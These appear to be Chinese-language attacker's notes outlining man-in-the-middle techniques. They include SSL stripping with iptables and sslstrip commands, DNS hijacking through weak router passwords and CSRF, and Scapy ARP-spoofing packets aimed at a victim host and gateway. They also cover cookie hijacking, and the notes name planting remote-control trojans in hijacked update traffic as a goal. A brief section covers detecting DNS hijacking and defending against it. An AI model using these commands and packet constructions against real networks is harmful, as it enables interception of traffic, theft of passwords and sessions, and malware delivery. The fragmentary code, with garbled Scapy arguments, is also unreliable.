中间人
SSL
检查外网网站是否安装SSL协议以及SSV版本 wosign.ssllabs.com SSL密码嗅探 sslstrip "# echo 1 > /proc/sys/net/ipv4/ip_forward # iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000 # sslstrip -l 10000"
DNS劫持
目的
钓鱼/DOS/在网页返回包中植入广告/监控下载行为进行病毒木马程序的替换/监控某款软件的升级行为对升级包进行替换植入远程控制的木马
路由器漏洞弱口令 -》篡改DNS指向自己DNS服务器->实现区域的网络流量劫持和篡改、窃取敏感信息、通过替换返回流量植入远控木马
方法
CSRF -> 修改路由器账号密码
检测
通过命令”ipconfig -all”或者”ifconfig”定期读取到本地的DNS设置
建立可信DNS白名单的方式对本地DNS的安全性进行判断
根据DNS劫持的原理,由于DNS劫持后会对全部或者部分流量进行代理,这种技术一个简单的实现思路,就是不管你请求什么域名,返回的IP地址会统一指向攻击者控制的流量监控和转发服务器的IP地址,然后那个服务器会对经过的流量进行监控和替换,因此通过ping命令,ping若干知名站点,如百度(www.baidu.com)、京东(www.jd.com),若返回IP为当前DNS的IP或某一个相同的IP,则可判断已受到上述这种DNS劫持攻击
防御
准备备用域名/手动修改DNS/手动修改路由器密码
ARP欺骗
原理 IP->被攻击者IP mac->攻击者mac / 使局域网中指定的/全部 目标机器数据包-通过攻击者主机转发 类型-多数情况下都是同时使用 主机型 网关型 目的 数据监听/敏感信息获取/重放攻击/篡改/钓鱼/结合DNS欺骗进一步渗透 Kali/攻击 ip:192.168.1.102/ MAC:00:0c:29:6e:98:a6 Windows/目标 IP:192.168.1.18 Getway IP:192.168.1.1 "pkt = Ether(src=[1.102的MAC], dst=[1.18的Mac]) / ARP(1.102的MAC, 网关IP地址, hwdst=1.18MAC, pdst=1.18IP地址, op=2) 或者 pkt = Ether(src=[1.102的MAC], dst=[1. 18的Mac]) / ARP(1.102的MAC, 网关IP地址, hwdst=1. 18MAC, pdst=1. 18IP地址, op=1)" 1. 18发往网关的数据包都会被发往1.102。 "pkt = Ether(src=[1.102的MAC], dst=[网关的Mac]) / ARP(1.102的MAC, 1. 18地址, hwdst=网关MAC,pdst=网关IP地址, op=2) 或者pkt = Ether(src=[1.102的MAC], dst=[网关的Mac]) / ARP(1.102的MAC, 1. 18地址, hwdst=网关MAC, pdst=网关IP地址, op=1)" 网关发往1.18的数据包都发送到Kali Linux(1.102)上 pkt = Ether(src=mac, dst='ff:ff:ff:ff:ff:ff') / ARP(hwsrc=mac, psrc=args[0], op=2) 广播欺骗 drifnet 欺骗成功后利用工具/FILTER和REPLACE数据构造
Cookie劫持
Cookie-Injecting-Tools 谷歌扩展工具/https://github.com/lfzark/cookie-injecting-tools
URL劫持
302跳转
开源项目
https://github.com/stevenvachon/broken-link-checker js劫持